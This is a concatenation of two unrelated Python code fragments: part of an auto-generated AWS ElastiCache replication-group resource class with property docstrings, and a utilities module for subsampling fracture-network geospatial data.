The number of cache clusters (primary and replicas) this replication group will have. If Multi-AZ is enabled, the value of this parameter must be at least 2. Updates will occur before other modifications.
"""
__props__['numberCacheClusters'] = number_cache_clusters
if parameter_group_name and not isinstance(parameter_group_name, basestring):
raise TypeError('Expected property parameter_group_name to be a basestring')
__self__.parameter_group_name = parameter_group_name
"""
The name of the parameter group to associate with this replication group. If this argument is omitted, the default cache parameter group for the specified engine is used.
"""
__props__['parameterGroupName'] = parameter_group_name
if port and not isinstance(port, int):
raise TypeError('Expected property port to be a int')
__self__.port = port
"""
The port number on which each of the cache nodes will accept connections. For Memcache the default is 11211, and for Redis the default port is 6379.
"""
__props__['port'] = port
if not replication_group_description:
raise TypeError('Missing required property replication_group_description')
elif not isinstance(replication_group_description, basestring):
raise TypeError('Expected property replication_group_description to be a basestring')
__self__.replication_group_description = replication_group_description
"""
A user-created description for the replication group.
"""
__props__['replicationGroupDescription'] = replication_group_description
if not replication_group_id:
raise TypeError('Missing required property replication_group_id')
elif not isinstance(replication_group_id, basestring):
raise TypeError('Expected property replication_group_id to be a basestring')
__self__.replication_group_id = replication_group_id
"""
The replication group identifier. This parameter is stored as a lowercase string.
"""
__props__['replicationGroupId'] = replication_group_id
if security_group_ids and not isinstance(security_group_ids, list):
raise TypeError('Expected property security_group_ids to be a list')
__self__.security_group_ids = security_group_ids
"""
One or more Amazon VPC security groups associated with this replication group. Use this parameter only when you are creating a replication group in an Amazon Virtual Private Cloud
"""
__props__['securityGroupIds'] = security_group_ids
if security_group_names and not isinstance(security_group_names, list):
raise TypeError('Expected property security_group_names to be a list')
__self__.security_group_names = security_group_names
"""
A list of cache security group names to associate with this replication group.
"""
__props__['securityGroupNames'] = security_group_names
if snapshot_arns and not isinstance(snapshot_arns, list):
raise TypeError('Expected property snapshot_arns to be a list')
__self__.snapshot_arns = snapshot_arns
"""
A single-element string list containing an
Amazon Resource Name (ARN) of a Redis RDB snapshot file stored in Amazon S3.
Example: `arn:aws:s3:::my_bucket/snapshot1.rdb`
"""
__props__['snapshotArns'] = snapshot_arns
if snapshot_name and not isinstance(snapshot_name, basestring):
raise TypeError('Expected property snapshot_name to be a basestring')
__self__.snapshot_name = snapshot_name
"""
The name of a snapshot from which to restore data into the new node group. Changing the `snapshot_name` forces a new resource.
"""
__props__['snapshotName'] = snapshot_name
if snapshot_retention_limit and not isinstance(snapshot_retention_limit, int):
raise TypeError('Expected property snapshot_retention_limit to be a int')
__self__.snapshot_retention_limit = snapshot_retention_limit
"""
The number of days for which ElastiCache will
retain automatic cache cluster snapshots before deleting them. For example, if you set
SnapshotRetentionLimit to 5, then a snapshot that was taken today will be retained for 5 days
before being deleted. If the value of SnapshotRetentionLimit is set to zero (0), backups are turned off.
Please note that setting a `snapshot_retention_limit` is not supported on cache.t1.micro or cache.t2.* cache nodes
"""
__props__['snapshotRetentionLimit'] = snapshot_retention_limit
if snapshot_window and not isinstance(snapshot_window, basestring):
raise TypeError('Expected property snapshot_window to be a basestring')
__self__.snapshot_window = snapshot_window
"""
The daily time range (in UTC) during which ElastiCache will
begin taking a daily snapshot of your cache cluster. The minimum snapshot window is a 60 minute period. Example: `05:00-09:00`
"""
__props__['snapshotWindow'] = snapshot_window
if subnet_group_name and not isinstance(subnet_group_name, basestring):
raise TypeError('Expected property subnet_group_name to be a basestring')
__self__.subnet_group_name = subnet_group_name
"""
The name of the cache subnet group to be used for the replication group.
"""
__props__['subnetGroupName'] = subnet_group_name
if tags and not isinstance(tags, dict):
raise TypeError('Expected property tags to be a dict')
__self__.tags = tags
"""
A mapping of tags to assign to the resource
"""
__props__['tags'] = tags
if transit_encryption_enabled and not isinstance(transit_encryption_enabled, bool):
| |
<gh_stars>0
"""
General utilities for subsampling.
"""
import csv
import logging
import random
from concurrent.futures import ProcessPoolExecutor, as_completed
from enum import Enum, unique
from itertools import compress, count
from pathlib import Path
from subprocess import check_call
from typing import Any, Dict, List, Literal, Optional, Sequence, Tuple, Union
import geopandas as gpd
import numpy as np
import pandas as pd
from matplotlib.axes import Axes
from pandas.core.groupby.generic import DataFrameGroupBy
class Utils:
"""
General selection, column names, etc. data.
"""
radius = "radius"
relative_coverage = "relative coverage"
name = "name"
trace_power_law_vs_lognormal_r = "trace power_law vs. lognormal R"
trace_power_law_vs_lognormal_p = "trace power_law vs. lognormal p"
params_with_func = {
# "Fracture Intensity (Mauldon)": "mean",
"Fracture Intensity P21": "mean",
"Dimensionless Intensity B22": "mean",
"Connections per Branch": "mean",
"trace power_law exponent": "mean",
"trace power_law cut-off": "mean",
"Number of Traces": "sum",
"Number of Branches": "sum",
"radius": "sum",
"I": "sum",
"Y": "sum",
"X": "sum",
"Trace Boundary 1 Intersect Count": "sum",
"Trace Boundary 2 Intersect Count": "sum",
"Trace Boundary 0 Intersect Count": "sum",
"Trace Mean Length": "mean",
"Branch Mean Length": "mean",
}
renamed_params = {
"trace power_law exponent": "Trace Power-law Exponent",
"branch power_law exponent": "Branch Power-law Exponent",
}
selected_params = {
"Connections per Branch",
"trace power_law exponent",
"Fracture Intensity P21",
"Dimensionless Intensity B22",
}
table_params = {
"Fracture Intensity P21",
"Dimensionless Intensity B22",
"Connections per Branch",
"trace power_law exponent",
"trace power_law cut-off",
"trace power_law vs. lognormal R",
"trace power_law vs. lognormal p",
"Trace Mean Length",
"Branch Mean Length",
"Number of Traces",
"Number of Branches",
"radius",
"I",
"Y",
"X",
"E",
"C - C",
"C - I",
"I - I",
}
unit_dict = {
"Fracture Intensity P21": "[$m/m^2$]",
"Dimensionless Intensity B22": "[-]",
"Connections per Branch": "[-]",
"Trace Power-law Exponent": "[-]",
}
@unique
class Skip(Enum):
"""
Enums for skip options.
"""
valid = "valid"
invalid = "invalid"
empty = "empty"
SCRIPTS_RUN_CMD = "python3 -m fractopo_subsampling"
def param_renamer(param: str):
"""
Rename param for nicer plotting name.
If no rename in renamed_params is defined no renaming is done.
"""
try:
return Utils.renamed_params[param]
except KeyError:
return param
def random_sample_of_circles(
grouped: DataFrameGroupBy,
circle_names_with_diameter: Dict[str, int],
min_circles: int = 1,
max_circles: int = None,
min_area: float = 0.0,
max_area: float = None,
) -> List[pd.Series]:
"""
Get a random sample of circles from grouped subsampled data.
Both the amount of overall circles and which circles within each group
is random. Data is grouped by target area name.
"""
if max_circles is not None:
assert max_circles >= min_circles
# Area names
names = list(grouped.groups.keys())
# Get area of the base circles corresponding to area name
areas = [np.pi * (circle_names_with_diameter[name] / 2) ** 2 for name in names]
# All indexes
idxs = list(range(0, len(grouped)))
# "Randomly" choose how many circles
# Is constrained by given min_circles and max_circles
how_many = random.randint(
min_circles, len(grouped) if max_circles is None else max_circles
)
# Collect indexes of base circles
which_idxs = []
for _ in range(how_many):
compressor = [idx not in which_idxs for idx in idxs]
possible_idxs = list(compress(idxs, compressor))
possible_areas = list(compress(areas, compressor))
choice = random.choices(population=possible_idxs, weights=possible_areas, k=1)[
0
]
which_idxs.append(choice)
assert len(which_idxs) == how_many
# Collect the Series that are chosen
chosen: List[pd.Series] = []
# Iterate over the DataFrameGroupBy dataframe groups
for idx, (_, group) in enumerate(grouped):
# Skip if not chosen base circle previously
if idx not in which_idxs:
continue
# radii = group["radius"].values
# radii_weights = normalize_and_invert_weights(
# radii,
# max_value=(Utils.circle_names_with_diameter[str(name)] / 2)
# if name in Utils.circle_names_with_diameter
# else None,
# )
# radii_weights = radii
# Make continous index from 0
indexer = count(0)
indexes = [next(indexer) for _ in group.index.values]
# If min_area or max_area are given, the choices are filtered
# accordingly
if min_area > 0 or max_area is not None:
# Get circle areas
areas = group["area"].to_numpy()
# Solve max_area
max_area = np.max(areas) if max_area is None else max_area
# Filter out areas that do not fit within the range
area_compressor = [min_area <= area <= max_area for area in areas]
# Filter out indexes accordingly
indexes = list(compress(indexes, area_compressor))
assert len(indexes) > 0
# Choose from indexes
choice = random.choices(population=indexes, k=1)[0]
# Get the Series at choice index
srs = group.iloc[choice]
assert isinstance(srs, pd.Series)
# Collect
chosen.append(srs)
assert len(chosen) == how_many
# Return chosen subsampled circles from base circles
return chosen
def normalize_and_invert_weights(
weights: Sequence[float], max_value: Optional[float] = None
) -> Sequence[float]:
"""
Normalize a list of weights and invert them.
"""
# Return if empty
if len(weights) == 0:
return weights
# Get actual max value of weights if none is given
if max_value is None:
max_value = max(weights)
else:
assert max_value >= max(weights)
# Normalize and invert
return [1 - (val / max_value) for val in weights]
def numpy_to_python_type(value):
"""
Convert to Python type from numpy with .item().
"""
try:
return value.item()
except AttributeError:
return value
def aggregate_chosen(
chosen: List[pd.Series], params_with_func: Dict[str, str]
) -> Dict[str, Any]:
"""
Aggregate a collection of subsampled circles for params.
Weights averages by the area of each subsampled circle.
"""
total_area = numpy_to_python_type(sum([srs["area"] for srs in chosen]))
assert isinstance(total_area, (float, int))
total_count = len(chosen)
values = dict(area=total_area, circle_count=total_count)
for param, func in params_with_func.items():
if func == "mean":
func_value = np.average(
[srs[param] for srs in chosen], weights=[srs["area"] for srs in chosen]
)
elif func == "sum":
func_value = np.array([srs[param] for srs in chosen]).sum()
else:
raise ValueError("Expected mean or sum.")
func_value = numpy_to_python_type(func_value)
assert isinstance(func_value, (float, int))
values[param] = func_value
return values
def constrain_radius(
names: np.ndarray, radiuses: np.ndarray, circle_names_with_diameter: Dict[str, int]
) -> List[bool]:
"""
Constrain dataset radiuses to one fourth of the full diameter.
"""
constrained = []
for name, radius in zip(names, radiuses):
assert name in circle_names_with_diameter
full_radius = circle_names_with_diameter[name]
constrained.append(full_radius / 4 >= radius)
assert len(constrained) == len(names) == len(radiuses)
return constrained
def radius_to_area(radius: float):
"""
Convert circle radius to area.
"""
return np.pi * radius ** 2
def area_to_radius(area: float):
"""
Convert circle area to radius.
"""
return np.sqrt(area / np.pi)
def filter_dataframe(
df: Union[gpd.GeoDataFrame, pd.DataFrame],
filter_names: List[str],
filter_radius: Tuple[float, float],
relative_coverage_threshold: float,
) -> Union[gpd.GeoDataFrame, pd.DataFrame]:
"""
Filter (Geo)DataFrame to input names and thresholds.
"""
start_length = df.shape[0]
assert df.shape[0] > 0
named_df = df.loc[np.isin(df[Utils.name], filter_names)]
print(f"Name filtered: {start_length - named_df.shape[0]}")
assert named_df.shape[0] > 0
radius_df = named_df.loc[
[filter_radius[0] <= val <= filter_radius[1] for val in named_df[Utils.radius]]
]
print(f"Radius filtered: {named_df.shape[0] - radius_df.shape[0] }")
assert radius_df.shape[0] > 0
coverage_df = radius_df.loc[
radius_df[Utils.relative_coverage] < relative_coverage_threshold
]
print(f"Coverage filtered: {radius_df.shape[0] - coverage_df.shape[0] }")
assert coverage_df.shape[0] > 0
return coverage_df
def paper_figsize(
multiplier: float,
paper_height=11.7,
paper_width=8.27,
) -> Tuple[float, float]:
"""
Get figsize for A4.
"""
return (paper_width, min([paper_height, paper_height * multiplier]))
def label_point(
xs: Sequence[float], ys: Sequence[float], vals: Sequence, ax: Axes, **text_kwargs
):
"""
Label points in plot.
"""
[ax.text(x + 0.02, y, str(val), **text_kwargs) for x, y, val in zip(xs, ys, vals)]
def cached_subsampling(
dataframe_grouped: DataFrameGroupBy,
iterations: int,
savepath: Path,
circle_names_with_diameter: Dict[str, int],
subsample_area_limits: Optional[Tuple[float, float]] = None,
):
"""
Perform subsampling.
"""
if savepath.exists():
agg_df = read_csv(savepath, index_col=[0])
else:
agg_df = pd.DataFrame(
[
aggregate_chosen(
random_sample_of_circles(
dataframe_grouped,
circle_names_with_diameter,
min_area=subsample_area_limits[0],
max_area=subsample_area_limits[1],
),
params_with_func=Utils.params_with_func,
)
for _ in range(iterations)
]
)
savepath.parent.mkdir(parents=True, exist_ok=True)
save_csv(agg_df, savepath, index=True)
return agg_df
def collect_paths(
csv_path: str,
skip: List[Literal[Skip.empty, Skip.valid, Skip.invalid]],
filter: str = "",
) -> Tuple[List[Path], List[Path], List[Tuple[str, str, float]]]:
"""
Collect trace and area paths from relations.csv file.
"""
if not all([val in Skip for val in skip]):
raise ValueError(f"Expected skip vals to be one of {Skip}.")
traces_paths, area_paths, marks = [], [], []
with Path(csv_path).open("r") as csvfile:
reader = csv.reader(csvfile)
for idx, row in enumerate(reader):
if idx == 0:
continue
base_path = "{}/{}/{}/{}"
area_path = Path(
base_path.format(row[2], "areas", row[3], row[0] + ".gpkg")
).resolve()
traces_path = Path(
base_path.format(row[2], "traces", row[3], row[1] + ".gpkg")
).resolve()
if not (area_path.exists() and traces_path.exists()):
continue
if row[4] == "True" and Skip.valid in skip:
# Do not collect valid.
continue
if row[4] == "False" and Skip.invalid in skip:
# Do not collect invalid.
continue
if row[5] == "True" and Skip.empty in skip:
# Do not collect empty.
continue
if len(filter) > 0 and filter not in area_path.stem:
# Only collect area paths that |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.